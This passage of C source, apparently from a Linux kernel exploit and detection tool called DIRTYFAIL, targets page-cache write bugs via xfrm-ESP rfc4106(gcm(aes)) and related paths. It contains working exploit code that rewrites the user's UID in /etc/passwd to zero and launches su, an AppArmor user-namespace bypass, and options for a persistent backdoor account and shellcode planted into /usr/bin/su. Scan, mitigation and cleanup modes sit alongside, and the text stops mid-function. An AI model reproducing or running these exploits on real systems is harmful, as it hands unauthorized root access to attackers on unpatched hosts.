#else /* !__linux__ */
bool cfg_1byte_write(const char *p, off_t o, unsigned char b)
{ (void)p; (void)o; (void)b; return false; }
#endif
/* ---------------------------------------------------------------- *
* Top-level exploit (UID flip end-to-end)
* ---------------------------------------------------------------- */
/* INNER (bypass userns): cfg_1byte_write × 4 to flip UID digits to '0'. */
df_result_t copyfail_gcm_exploit_inner(void)
{
#ifdef __linux__
const char *user = getenv("DIRTYFAIL_TARGET_USER");
if (!user || !*user) {
log_bad("inner: DIRTYFAIL_TARGET_USER not set");
return DF_TEST_ERROR;
}
off_t uid_off; size_t uid_len; char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("inner: find_passwd_uid_field('%s') failed", user);
return DF_TEST_ERROR;
}
if (uid_len != 4) {
log_bad("inner: UID '%s' not 4 chars", uid_str);
return DF_TEST_ERROR;
}
for (size_t i = 0; i < 4; i++) {
if (uid_str[i] == '0') continue;
log_step("inner: flip /etc/passwd[%lld] '%c' -> '0'",
(long long)(uid_off + i), uid_str[i]);
if (!cfg_1byte_write("/etc/passwd", uid_off + i, '0')) {
log_bad("inner: byte flip failed at offset %lld",
(long long)(uid_off + i));
return DF_EXPLOIT_FAIL;
}
}
return DF_EXPLOIT_OK;
#else
return DF_TEST_ERROR;
#endif
}
/* OUTER (init ns): prompts → fork bypass child → wait → verify → su. */
df_result_t copyfail_gcm_exploit(bool do_shell)
{
log_step("Copy Fail GCM variant — exploit");
uid_t target_uid = getuid();
if (target_uid == 0) {
log_warn("already root in init namespace");
return DF_OK;
}
struct passwd *pw = getpwuid(target_uid);
if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; }
const char *user = pw->pw_name;
off_t uid_off; size_t uid_len; char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("user %s not found in /etc/passwd", user);
return DF_TEST_ERROR;
}
log_step("/etc/passwd UID for %s: '%s' at offset %lld",
user, uid_str, (long long)uid_off);
if (uid_len != 4) {
log_bad("UID '%s' is %zu chars; need 4", uid_str, uid_len);
return DF_TEST_ERROR;
}
log_warn("about to flip /etc/passwd UID via rfc4106(gcm(aes)) byte-flips");
log_warn("(up to four 1-byte writes, one per UID digit not already '0')");
if (!typed_confirm("DIRTYFAIL")) { log_bad("confirmation declined"); return DF_OK; }
if (!ssh_lockout_check(user)) { log_bad("ssh-lockout declined"); return DF_OK; }
setenv("DIRTYFAIL_INNER_MODE", "gcm", 1);
setenv("DIRTYFAIL_TARGET_USER", user, 1);
int rc = apparmor_bypass_fork_arm(0, NULL);
if (rc != DF_EXPLOIT_OK) {
log_bad("inner exploit failed (exit=%d)", rc);
return DF_EXPLOIT_FAIL;
}
/* Verify in init ns */
int v = open("/etc/passwd", O_RDONLY);
if (v < 0) return DF_EXPLOIT_FAIL;
if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; }
char land[5] = {0};
if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; }
close(v);
if (memcmp(land, "0000", 4) != 0) {
log_bad("verify: page cache reads '%.4s'", land);
return DF_EXPLOIT_FAIL;
}
log_ok("page cache now reports %s with uid 0 (via GCM path)", user);
if (!do_shell) {
if (try_revert_passwd_page_cache())
log_ok("page cache reverted (--no-shell)");
else
log_warn("page cache may still be modified — `sudo dirtyfail --cleanup` or reboot");
return DF_EXPLOIT_OK;
}
log_ok("invoking 'su %s' in init ns — enter your password for REAL root", user);
execlp("su", "su", user, (char *)NULL);
log_bad("execlp: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
/* ---------------------------------------------------------------- *
* Active probe — `--scan --active`.
*
* Install GCM SA with an arbitrary IV and fire ONE trigger against a
* /tmp sentinel. We skip the IV brute force: keystream XOR ciphertext
* is unpredictable but ANY byte change at sentinel[0] proves the
* kernel ran the in-place STORE.
* ---------------------------------------------------------------- */
df_result_t copyfail_gcm_active_probe_inner(void)
{
#ifdef __linux__
const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL");
if (!sentinel || !*sentinel) {
log_bad("gcm-probe: DIRTYFAIL_PROBE_SENTINEL not set");
return DF_TEST_ERROR;
}
/* Arbitrary fixed 8-byte wire IV (rfc4106 wraps it with the 4-byte
* SA salt to form the 12-byte GCM nonce). Keystream is deterministic
* given this IV + key, but we don't need to predict it for the
* probe — any byte change in sentinel[0] proves the STORE happened. */
static const uint8_t probe_iv[IV_LEN] = {
0xDE, 0xAD, 0xBE, 0xEF, 0x01, 0x02, 0x03, 0x04
};
if (!gcm_install_sa(probe_iv)) {
log_bad("gcm-probe: ip xfrm state add failed");
return DF_TEST_ERROR;
}
if (!gcm_trigger(sentinel, 0, probe_iv)) {
log_bad("gcm-probe: trigger failed");
return DF_TEST_ERROR;
}
return DF_EXPLOIT_OK;
#else
return DF_TEST_ERROR;
#endif
}
df_result_t copyfail_gcm_active_probe(void)
{
char tmpl[] = "/tmp/dirtyfail-gcm-probe.XXXXXX";
int sfd = mkstemp(tmpl);
if (sfd < 0) { log_bad("gcm-probe mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; }
unsigned char filler[4096];
memset(filler, 'A', sizeof(filler));
if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) {
close(sfd); unlink(tmpl); return DF_TEST_ERROR;
}
close(sfd);
int rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
char tmp[4096];
if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) {
close(rfd); unlink(tmpl); return DF_TEST_ERROR;
}
close(rfd);
setenv("DIRTYFAIL_INNER_MODE", "gcm-probe", 1);
setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1);
int rc = apparmor_bypass_fork_arm(0, NULL);
unsetenv("DIRTYFAIL_INNER_MODE");
unsetenv("DIRTYFAIL_PROBE_SENTINEL");
if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; }
if (rc != DF_EXPLOIT_OK) {
log_bad("gcm-probe inner failed (exit=%d)", rc);
unlink(tmpl); return DF_TEST_ERROR;
}
rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
unsigned char after[16];
ssize_t got = read(rfd, after, sizeof(after));
close(rfd);
unlink(tmpl);
if (got <= 0) return DF_TEST_ERROR;
if (after[0] != 'A') {
log_warn("ACTIVE PROBE gcm: sentinel[0] changed 'A' → 0x%02x → kernel is VULNERABLE",
after[0]);
return DF_VULNERABLE;
}
log_ok("ACTIVE PROBE gcm: sentinel[0] intact — kernel rfc4106 path appears patched");
return DF_OK;
}
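The active probe above reduces to a sentinel pattern: fill a scratch file with a known byte, run the operation under test, then check whether byte 0 still holds that value. A minimal sketch of the bookkeeping on either side of the probe follows. The helper names `sentinel_create` and `sentinel_changed` and both macros are assumptions made for illustration and do not appear in the DIRTYFAIL sources.

```c
#include <fcntl.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define SENTINEL_FILL 'A'   /* assumed fill byte, matching the probe above */
#define SENTINEL_SIZE 4096  /* one page on common configurations */

/* Create a sentinel file filled with SENTINEL_FILL. `tmpl` must end in
 * "XXXXXX"; mkstemp rewrites it in place with the real file name. */
bool sentinel_create(char *tmpl)
{
    int fd = mkstemp(tmpl);
    if (fd < 0)
        return false;

    unsigned char filler[SENTINEL_SIZE];
    memset(filler, SENTINEL_FILL, sizeof(filler));
    bool ok = write(fd, filler, sizeof(filler)) == (ssize_t)sizeof(filler);

    close(fd);
    if (!ok)
        unlink(tmpl);
    return ok;
}

/* Returns 1 if byte 0 no longer equals SENTINEL_FILL, 0 if it is
 * intact, and -1 if the file could not be read. */
int sentinel_changed(const char *path)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;

    unsigned char first;
    ssize_t n = read(fd, &first, 1);
    close(fd);

    if (n != 1)
        return -1;
    return first != SENTINEL_FILL;
}
```

Keeping "could not read" separate from "intact" matters for a scanner: an unreadable sentinel should map to a test error, not to a "patched" verdict.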
+61
@@ -0,0 +1,61 @@
/*
* DIRTYFAIL — copyfail_gcm.h
*
* Single-byte page-cache write via xfrm-ESP `rfc4106(gcm(aes))` AEAD.
*
* This module is a sibling primitive to copyfail.c (4-byte authencesn
* STORE) and dirtyfrag_esp.c (4-byte authencesn STORE via XFRM). It
* targets the SAME bug class (CVE-2026-43284 xfrm-ESP no-COW path),
* but uses `rfc4106(gcm(aes))` instead of `authencesn(...)` as the
* AEAD. That changes the primitive in two useful ways:
*
* 1. Coverage. A defender who blacklisted only `algif_aead` to stop
* Copy Fail (CVE-2026-31431) is still vulnerable here — neither
* algif_aead nor the authencesn template is on the path.
*
* 2. Granularity. AES-GCM is a counter-mode cipher; in-place
* "decryption" is just XORing the keystream onto the spliced
* page byte. We can land an arbitrary single byte at any file
* offset (no 4-byte alignment, no 4-byte side-effects) by
* brute-forcing the IV until keystream[0] equals
* `target_byte XOR desired_byte`.
*
* The 1-byte primitive is what makes the persistent backdoor mode
* (`backdoor.c`) feasible without alignment juggling.
*
* Technique credit: 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo
* (`copyfail2.c`), reimplemented here in DIRTYFAIL style.
*/
#ifndef DIRTYFAIL_COPYFAIL_GCM_H
#define DIRTYFAIL_COPYFAIL_GCM_H
#include "common.h"
/* Detection: kernel + esp4 + rfc4106(gcm(aes)) availability + userns. */
df_result_t copyfail_gcm_detect(void);
/* End-to-end PoC: flip /etc/passwd UID via rfc4106(gcm(aes)) STORE.
* Equivalent functional outcome to copyfail_exploit() and
* dirtyfrag_esp_exploit() — different kernel path. */
df_result_t copyfail_gcm_exploit(bool do_shell);
df_result_t copyfail_gcm_exploit_inner(void);
/* Low-level building block exposed for backdoor.c:
* write a single byte at `target_path` offset `target_off`. The caller
* MUST already be inside a fresh user namespace with CAP_NET_ADMIN
* (ESP SA registration prerequisite). Returns true on apparent
* success — caller verifies via re-read. */
bool cfg_1byte_write(const char *target_path,
off_t target_off,
unsigned char desired_byte);
/* Active probe: installs a GCM SA with arbitrary IV, fires ONE
* gcm_trigger against a /tmp sentinel. Skips IV brute force entirely;
* the kernel STORE writes an unpredictable byte (keystream XOR 'A')
* which still confirms the path is reachable. Returns DF_VULNERABLE
* on byte change, DF_OK if intact, DF_PRECOND_FAIL on AA-block. */
df_result_t copyfail_gcm_active_probe(void);
df_result_t copyfail_gcm_active_probe_inner(void);
#endif
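The design notes above describe AES-GCM as a counter-mode cipher. The sketch below shows only the standard block layout behind that statement. RFC 4106 forms the 12-byte GCM nonce as the 4-byte SA salt followed by the 8-byte wire IV. NIST SP 800-38D then sets J0 to the nonce followed by 0x00000001 and uses J0 + 1 as the counter for the first data block. The function and macro names are assumptions made for illustration, and no cipher call is made here.

```c
#include <stdint.h>
#include <string.h>

#define SALT_LEN    4   /* from the SA key material (RFC 4106) */
#define WIRE_IV_LEN 8   /* carried in each ESP packet */
#define NONCE_LEN   12  /* SALT_LEN + WIRE_IV_LEN */
#define BLOCK_LEN   16  /* AES block size */

/* RFC 4106 nonce layout: salt(4) || wire IV(8). */
void rfc4106_nonce(const uint8_t salt[SALT_LEN],
                   const uint8_t iv[WIRE_IV_LEN],
                   uint8_t nonce[NONCE_LEN])
{
    memcpy(nonce, salt, SALT_LEN);
    memcpy(nonce + SALT_LEN, iv, WIRE_IV_LEN);
}

/* SP 800-38D, 96-bit nonce case: J0 = nonce || 0x00000001, and the
 * first data block is processed with J0 + 1 = nonce || 0x00000002.
 * The 32-bit counter is big-endian. */
void gcm_first_data_counter(const uint8_t nonce[NONCE_LEN],
                            uint8_t block[BLOCK_LEN])
{
    memcpy(block, nonce, NONCE_LEN);
    block[12] = 0;
    block[13] = 0;
    block[14] = 0;
    block[15] = 2;
}
```

J0 itself is reserved for masking the authentication tag, which is why the data counter starts at 2 rather than 1.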
+475
@@ -0,0 +1,475 @@
/*
* DIRTYFAIL — main entry point
*
* A single binary that detects and (with explicit consent) demonstrates
* exploitation of:
*
* - Copy Fail CVE-2026-31431
* - Dirty Frag (xfrm-ESP) CVE-2026-43284
* - Dirty Frag (RxRPC) CVE-2026-43500
*
* Default mode is detection. The exploit modes never run without
* --exploit on the command line *and* a typed-string confirmation at
* runtime.
*
* Exit codes:
* 0 not vulnerable (or: exploit succeeded — semantically "you can
* now type `exit` and the test ran")
* 1 test error / could not determine
* 2 vulnerable
* 3 exploit attempted but did not land
* 4 preconditions not met (effectively "not vulnerable here")
* 5 exploit succeeded and a root shell was spawned
*/
#include "common.h"
#include "copyfail.h"
#include "copyfail_gcm.h"
#include "dirtyfrag_esp.h"
#include "dirtyfrag_esp6.h"
#include "dirtyfrag_rxrpc.h"
#include "apparmor_bypass.h"
#include "backdoor.h"
#include "mitigate.h"
#include "exploit_su.h"
#include <getopt.h>
#include <fcntl.h>
#include <sys/utsname.h>
static const char BANNER[] =
"\n"
" ██████╗ ██╗██████╗ ████████╗██╗ ██╗███████╗ █████╗ ██╗██╗ \n"
" ██╔══██╗██║██╔══██╗╚══██╔══╝╚██╗ ██╔╝██╔════╝██╔══██╗██║██║ \n"
" ██║ ██║██║██████╔╝ ██║ ╚████╔╝ █████╗ ███████║██║██║ \n"
" ██║ ██║██║██╔══██╗ ██║ ╚██╔╝ ██╔══╝ ██╔══██║██║██║ \n"
" ██████╔╝██║██║ ██║ ██║ ██║ ██║ ██║ ██║██║███████╗ \n"
" ╚═════╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚══════╝ \n"
" Copy Fail + Dirty Frag detector & PoC\n"
" CVE-2026-31431 / 43284 / 43500\n";
static void usage(const char *prog)
{
fprintf(stderr,
"Usage: %s [MODE] [OPTIONS]\n"
"\n"
"Modes (pick one; default is --scan):\n"
" --scan detect all three CVEs (no system modification)\n"
" --check-copyfail Copy Fail (CVE-2026-31431) detection only\n"
" --check-esp Dirty Frag xfrm-ESP (CVE-2026-43284) detection only\n"
" --check-rxrpc Dirty Frag RxRPC (CVE-2026-43500) detection only\n"
" --check-esp6 IPv6 xfrm-ESP path (CVE-2026-43284 v6) detection\n"
" --check-gcm Copy Fail GCM variant detection\n"
" --exploit-copyfail real PoC: flip /etc/passwd UID via algif_aead\n"
" --exploit-esp real PoC: flip /etc/passwd UID via xfrm-ESP (v4)\n"
" --exploit-esp6 real PoC: flip /etc/passwd UID via xfrm-ESP (v6)\n"
" --exploit-rxrpc real PoC: empty /etc/passwd root pwd via rxkad\n"
" (fcrypt brute-force + AF_RXRPC handshake forgery)\n"
" --exploit-gcm real PoC: flip /etc/passwd UID via rfc4106(gcm(aes))\n"
" single-byte primitive (works when authencesn is\n"
" blacklisted but rfc4106 isn't)\n"
" --exploit-backdoor PERSISTENT: insert dirtyfail::0:0:..:/:/bin/bash\n"
" into /etc/passwd page cache; survives shell exit\n"
" until page eviction. Use --cleanup-backdoor to revert.\n"
" --exploit-su V4bel-style: plant arch-specific shellcode at\n"
" /usr/bin/su entry point in page cache; running\n"
" su then yields a /bin/sh root shell. No PAM\n"
" dependency. x86_64 tested; aarch64 ships but is\n"
" hardware-untested (gated behind an env var).\n"
" Saves original entry-point bytes to\n"
" /var/tmp/.dirtyfail-su.state for revert via\n"
" --cleanup-su.\n"
" --cleanup evict /etc/passwd from page cache and drop_caches\n"
" --cleanup-backdoor restore /etc/passwd line from /var/tmp/.dirtyfail.state\n"
" --cleanup-su restore /usr/bin/su entry-point bytes from state file\n"
" --list-state report what (if anything) is currently planted —\n"
" reads /var/tmp/.dirtyfail*.state files and\n"
" describes each. Side-effect free.\n"
" --mitigate DEFENSIVE: blacklist algif_aead/esp4/esp6/rxrpc,\n"
" set apparmor_restrict_unprivileged_userns=1.\n"
" Requires root. Side-effect: breaks IPsec/AFS.\n"
" --cleanup-mitigate remove the modprobe/sysctl mitigation files\n"
" --version print version\n"
" --help this message\n"
"\n"
"Options:\n"
" --active in --scan / --check-* mode, do an active sentinel\n"
" STORE probe per CVE in addition to precondition\n"
" checks. Modifies /tmp sentinels only; never\n"
" touches /etc/passwd. Requires AA bypass on\n"
" hardened distros, so may take ~5-10s.\n"
" --no-shell after a successful exploit, do NOT execve `su`;\n"
" instead revert the page-cache patch and exit\n"
" --no-revert with --no-shell, also skip the auto-revert\n"
" (leaves the page cache poisoned — used by\n"
" tools/dirtyfail-container-escape.sh demo)\n"
" --json emit a single JSON object on stdout (--scan\n"
" only); all log output redirected to stderr.\n"
" Suitable for SIEM/fleet scanning. Implies\n"
" --no-color and suppresses the banner.\n"
" --no-color disable ANSI color in output\n"
" --aa-bypass force the AppArmor unprivileged-userns bypass\n"
" (auto-armed when restricted profile is detected)\n"
"\n"
"Exit codes:\n"
" 0 not vulnerable / clean 2 vulnerable 5 exploit succeeded\n"
" 1 test error 3 exploit failed 4 preconditions missing\n"
"\n"
"AUTHORIZED TESTING ONLY. Run only on systems you own or are explicitly\n"
"engaged to assess. The --exploit modes corrupt /etc/passwd in the\n"
"kernel page cache; cleanup with --cleanup or `echo 3 > /proc/sys/vm/drop_caches`.\n",
prog);
}
enum mode {
MODE_SCAN,
MODE_CHECK_COPYFAIL,
MODE_CHECK_ESP,
MODE_CHECK_ESP6,
MODE_CHECK_RXRPC,
MODE_CHECK_GCM,
MODE_EXPLOIT_COPYFAIL,
MODE_EXPLOIT_ESP,
MODE_EXPLOIT_ESP6,
MODE_EXPLOIT_RXRPC,
MODE_EXPLOIT_GCM,
MODE_EXPLOIT_BACKDOOR,
MODE_EXPLOIT_SU,
MODE_CLEANUP,
MODE_CLEANUP_BACKDOOR,
MODE_CLEANUP_SU,
MODE_MITIGATE,
MODE_CLEANUP_MITIGATE,
MODE_LIST_STATE,
MODE_HELP,
MODE_VERSION,
};
#define DIRTYFAIL_VERSION "0.1.0"
int main(int argc, char **argv)
{
/* Pick up flags that need to survive AA-bypass fork+re-exec via env.
* The child re-execs with its own argv (stage tags only), so flags
* set in the parent's argv don't reach the child unless we propagate
* them through env vars. --json is the main case: without this, the
* child's log_* output goes to stdout and corrupts the JSON document
* the parent is building. */
if (getenv("DIRTYFAIL_JSON")) {
dirtyfail_json = true;
dirtyfail_use_color = false;
}
/* If we're a re-exec from the apparmor bypass dance, route to the
* stage handler immediately. Stage 1 re-execs to stage 2; stage 2
* unshares + raises caps, then either:
* (a) DIRTYFAIL_INNER_MODE is set → we're a fork-based exploit
* child. Dispatch to the inner handler and exit. Parent
* (init ns) reaps us and continues with verify + su.
* (b) Not set → legacy `--aa-bypass` whole-process mode; fall
* through to the normal main() flow with rewritten argv. */
if (apparmor_bypass_is_stage(argc, argv)) {
int new_argc = argc;
char **new_argv = argv;
if (apparmor_bypass_run_stage(argc, argv, &new_argc, &new_argv) != 0) {
fprintf(stderr, "apparmor bypass stage failed\n");
return 1;
}
const char *inner = getenv("DIRTYFAIL_INNER_MODE");
if (inner && *inner) {
df_result_t r = DF_TEST_ERROR;
if (strcmp(inner, "esp") == 0) r = dirtyfrag_esp_exploit_inner();
else if (strcmp(inner, "esp6") == 0) r = dirtyfrag_esp6_exploit_inner();
else if (strcmp(inner, "rxrpc") == 0) r = dirtyfrag_rxrpc_exploit_inner();
else if (strcmp(inner, "gcm") == 0) r = copyfail_gcm_exploit_inner();
else if (strcmp(inner, "esp-probe") == 0) r = dirtyfrag_esp_active_probe_inner();
else if (strcmp(inner, "esp6-probe") == 0) r = dirtyfrag_esp6_active_probe_inner();
else if (strcmp(inner, "rxrpc-probe") == 0) r = dirtyfrag_rxrpc_active_probe_inner();
else if (strcmp(inner, "gcm-probe") == 0) r = copyfail_gcm_active_probe_inner();
else if (strcmp(inner, "backdoor-install") == 0) r = backdoor_install_inner();
else if (strcmp(inner, "backdoor-cleanup") == 0) r = backdoor_cleanup_inner();
else {
fprintf(stderr, "unknown DIRTYFAIL_INNER_MODE: %s\n", inner);
r = DF_TEST_ERROR;
}
return (int)r;
}
argc = new_argc;
argv = new_argv;
}
enum mode m = MODE_SCAN;
bool do_shell = true;
bool aa_bypass = false;
static const struct option opts[] = {
{"scan", no_argument, NULL, 'S'},
{"check-copyfail", no_argument, NULL, 1 },
{"check-esp", no_argument, NULL, 2 },
{"check-rxrpc", no_argument, NULL, 3 },
{"check-esp6", no_argument, NULL, 9 },
{"check-gcm", no_argument, NULL, 10 },
{"exploit-copyfail", no_argument, NULL, 4 },
{"exploit-esp", no_argument, NULL, 5 },
{"exploit-esp6", no_argument, NULL, 11 },
{"exploit-rxrpc", no_argument, NULL, 7 },
{"exploit-gcm", no_argument, NULL, 12 },
{"exploit-backdoor", no_argument, NULL, 13 },
{"cleanup", no_argument, NULL, 6 },
{"cleanup-backdoor", no_argument, NULL, 14 },
{"mitigate", no_argument, NULL, 15 },
{"cleanup-mitigate", no_argument, NULL, 16 },
{"active", no_argument, NULL, 17 },
{"exploit-su", no_argument, NULL, 18 },
{"cleanup-su", no_argument, NULL, 19 },
{"no-revert", no_argument, NULL, 20 },
{"json", no_argument, NULL, 21 },
{"list-state", no_argument, NULL, 22 },
{"no-shell", no_argument, NULL, 'n'},
{"no-color", no_argument, NULL, 'C'},
{"aa-bypass", no_argument, NULL, 8 },
{"help", no_argument, NULL, 'h'},
{"version", no_argument, NULL, 'V'},
{0,0,0,0}
};
int c;
while ((c = getopt_long(argc, argv, "ShVnC", opts, NULL)) != -1) {
switch (c) {
case 'S': m = MODE_SCAN; break;
case 1 : m = MODE_CHECK_COPYFAIL; break;
case 2 : m = MODE_CHECK_ESP; break;
case 3 : m = MODE_CHECK_RXRPC; break;
case 4 : m = MODE_EXPLOIT_COPYFAIL; break;
case 5 : m = MODE_EXPLOIT_ESP; break;
case 7 : m = MODE_EXPLOIT_RXRPC; break;
case 6 : m = MODE_CLEANUP; break;
case 9 : m = MODE_CHECK_ESP6; break;
case 10 : m = MODE_CHECK_GCM; break;
case 11 : m = MODE_EXPLOIT_ESP6; break;
case 12 : m = MODE_EXPLOIT_GCM; break;
case 13 : m = MODE_EXPLOIT_BACKDOOR; break;
case 14 : m = MODE_CLEANUP_BACKDOOR; break;
case 15 : m = MODE_MITIGATE; break;
case 16 : m = MODE_CLEANUP_MITIGATE; break;
case 17 : dirtyfail_active_probes = true; break;
case 18 : m = MODE_EXPLOIT_SU; break;
case 19 : m = MODE_CLEANUP_SU; break;
case 20 : dirtyfail_no_revert = true; break;
case 21 : dirtyfail_json = true;
dirtyfail_use_color = false;
/* Propagate through fork+re-exec for AA bypass children */
setenv("DIRTYFAIL_JSON", "1", 1);
break;
case 22 : m = MODE_LIST_STATE; break;
case 'n': do_shell = false; break;
case 'C': dirtyfail_use_color = false; break;
case 8 : aa_bypass = true; break;
case 'h': m = MODE_HELP; break;
case 'V': m = MODE_VERSION; break;
default : usage(argv[0]); return 1;
}
}
if (m == MODE_HELP) { usage(argv[0]); return 0; }
if (m == MODE_VERSION) { puts("DIRTYFAIL " DIRTYFAIL_VERSION); return 0; }
/* Exploit modes now do their OWN fork-based AA bypass internally
* (parent stays in init ns for the post-exploit `su` to drop into
* REAL init-ns root). We only arm the legacy whole-process bypass
* when the operator explicitly requests it via --aa-bypass — that
* path is mostly useful for debugging the bypass mechanics in
* isolation, not for actual exploitation. */
if (aa_bypass) {
log_warn("--aa-bypass: arming legacy whole-process bypass");
log_hint("note: exploit modes now do their own fork-based bypass; "
"this flag is for debugging only and may break su afterwards.");
if (apparmor_bypass_arm_and_relaunch(argc, argv) != 0) {
log_warn("apparmor bypass failed (%s) — continuing un-bypassed",
strerror(errno));
}
}
if (!dirtyfail_json) {
if (dirtyfail_use_color) fputs("\033[1;35m", stdout);
fputs(BANNER, stdout);
if (dirtyfail_use_color) fputs("\033[0m", stdout);
fputc('\n', stdout);
}
df_result_t r = DF_OK;
switch (m) {
case MODE_SCAN: {
log_step("running full scan — five detectors\n");
df_result_t a = copyfail_detect(); if (!dirtyfail_json) fputc('\n', stdout);
df_result_t b = dirtyfrag_esp_detect(); if (!dirtyfail_json) fputc('\n', stdout);
df_result_t b6 = dirtyfrag_esp6_detect(); if (!dirtyfail_json) fputc('\n', stdout);
df_result_t c2 = dirtyfrag_rxrpc_detect(); if (!dirtyfail_json) fputc('\n', stdout);
df_result_t g = copyfail_gcm_detect(); if (!dirtyfail_json) fputc('\n', stdout);
/* Sized to 8 so the `& 7` mask below can never index past the table. */
const char *label[8] = {
[DF_OK] = "not vulnerable",
[DF_TEST_ERROR] = "test error",
[DF_VULNERABLE] = "VULNERABLE",
[DF_PRECOND_FAIL] = "preconditions missing",
};
/* Sized to 8 so the `& 7` mask below can never index past the table. */
const char *json_label[8] = {
[DF_OK] = "not_vulnerable",
[DF_TEST_ERROR] = "test_error",
[DF_VULNERABLE] = "vulnerable",
[DF_PRECOND_FAIL] = "preconds_missing",
};
if (!dirtyfail_json) {
log_step("scan summary:");
log_hint(" Copy Fail (algif_aead, CVE-2026-31431): %s", label[a & 7]);
log_hint(" Dirty Frag ESP v4 (CVE-2026-43284): %s", label[b & 7]);
log_hint(" Dirty Frag ESP v6 (CVE-2026-43284 v6): %s", label[b6 & 7]);
log_hint(" Dirty Frag RxRPC (CVE-2026-43500): %s", label[c2 & 7]);
log_hint(" Copy Fail GCM variant (xfrm rfc4106): %s", label[g & 7]);
}
if (a == DF_VULNERABLE || b == DF_VULNERABLE || b6 == DF_VULNERABLE ||
c2 == DF_VULNERABLE || g == DF_VULNERABLE)
r = DF_VULNERABLE;
else if (a == DF_TEST_ERROR || b == DF_TEST_ERROR || b6 == DF_TEST_ERROR ||
c2 == DF_TEST_ERROR || g == DF_TEST_ERROR)
r = DF_TEST_ERROR;
else
r = DF_OK;
if (dirtyfail_json) {
struct utsname u; uname(&u);
const char *summary = json_label[r & 7];
printf("{\n");
printf(" \"tool\": \"dirtyfail\",\n");
printf(" \"version\": \"" DIRTYFAIL_VERSION "\",\n");
printf(" \"hostname\": \"%s\",\n", u.nodename);
printf(" \"kernel\": \"%s\",\n", u.release);
printf(" \"machine\": \"%s\",\n", u.machine);
printf(" \"active_probes\": %s,\n",
dirtyfail_active_probes ? "true" : "false");
printf(" \"results\": [\n");
printf(" {\"cve\": \"CVE-2026-31431\", \"name\": \"copyfail\", \"status\": \"%s\"},\n", json_label[a & 7]);
printf(" {\"cve\": \"CVE-2026-43284\", \"name\": \"dirtyfrag-esp\", \"status\": \"%s\"},\n", json_label[b & 7]);
printf(" {\"cve\": \"CVE-2026-43284-v6\", \"name\": \"dirtyfrag-esp6\", \"status\": \"%s\"},\n", json_label[b6 & 7]);
printf(" {\"cve\": \"CVE-2026-43500\", \"name\": \"dirtyfrag-rxrpc\", \"status\": \"%s\"},\n", json_label[c2 & 7]);
printf(" {\"cve\": \"CVE-2026-31431-gcm\", \"name\": \"copyfail-gcm\", \"status\": \"%s\"}\n", json_label[g & 7]);
printf(" ],\n");
printf(" \"summary\": \"%s\"\n", summary);
printf("}\n");
}
break;
}
case MODE_CHECK_COPYFAIL: r = copyfail_detect(); break;
case MODE_CHECK_ESP: r = dirtyfrag_esp_detect(); break;
case MODE_CHECK_ESP6: r = dirtyfrag_esp6_detect(); break;
case MODE_CHECK_RXRPC: r = dirtyfrag_rxrpc_detect(); break;
case MODE_CHECK_GCM: r = copyfail_gcm_detect(); break;
case MODE_EXPLOIT_COPYFAIL:
log_warn("running real PoC for Copy Fail (CVE-2026-31431)");
r = copyfail_exploit(do_shell);
break;
case MODE_EXPLOIT_ESP:
log_warn("running real PoC for Dirty Frag xfrm-ESP (CVE-2026-43284)");
r = dirtyfrag_esp_exploit(do_shell);
break;
case MODE_EXPLOIT_RXRPC:
log_warn("running real PoC for Dirty Frag RxRPC (CVE-2026-43500)");
r = dirtyfrag_rxrpc_exploit(do_shell);
break;
case MODE_EXPLOIT_ESP6:
log_warn("running real PoC for Dirty Frag IPv6 xfrm-ESP");
r = dirtyfrag_esp6_exploit(do_shell);
break;
case MODE_EXPLOIT_GCM:
log_warn("running real PoC for Copy Fail GCM variant (rfc4106)");
r = copyfail_gcm_exploit(do_shell);
break;
case MODE_EXPLOIT_BACKDOOR:
log_warn("installing PERSISTENT backdoor user 'dirtyfail' (page-cache only)");
r = backdoor_install(do_shell);
break;
case MODE_CLEANUP_BACKDOOR:
r = backdoor_cleanup();
break;
case MODE_EXPLOIT_SU:
log_warn("planting x86_64 shellcode at /usr/bin/su entry point (page cache)");
r = exploit_su_shellcode(do_shell);
break;
case MODE_CLEANUP_SU:
r = cleanup_su_shellcode();
break;
case MODE_MITIGATE:
r = mitigate_apply();
break;
case MODE_CLEANUP_MITIGATE:
r = mitigate_revert();
break;
case MODE_LIST_STATE: {
log_step("--list-state: scanning /var/tmp for stashed dirtyfail state files");
bool any = false;
if (backdoor_list_state()) any = true;
if (exploit_su_list_state()) any = true;
if (!any) {
log_ok("no dirtyfail state files present — system is clean");
} else {
log_hint("(state files only describe what was planted — they do");
log_hint(" not by themselves prove the page cache is still poisoned;");
log_hint(" run `--cleanup` / `--cleanup-backdoor` / `--cleanup-su`");
log_hint(" to evict + restore.)");
}
r = DF_OK;
break;
}
case MODE_CLEANUP:
log_step("evicting /etc/passwd page cache");
if (geteuid() != 0) {
/* POSIX_FADV_DONTNEED on a read-only fd held by a non-root
* user *silently no-ops* on Linux — fadvise returns 0 but
* does not actually evict any pages. The only path that
* works without write access is `drop_caches`, which
* itself needs root. So warn the operator clearly. */
log_warn("running as non-root: POSIX_FADV_DONTNEED will return 0 "
"but NOT evict any pages (kernel ignores it for readers "
"without write access). The page-cache STORE will persist "
"until eviction by memory pressure or reboot.");
log_warn("re-run as 'sudo dirtyfail --cleanup' to drop_caches.");
} else {
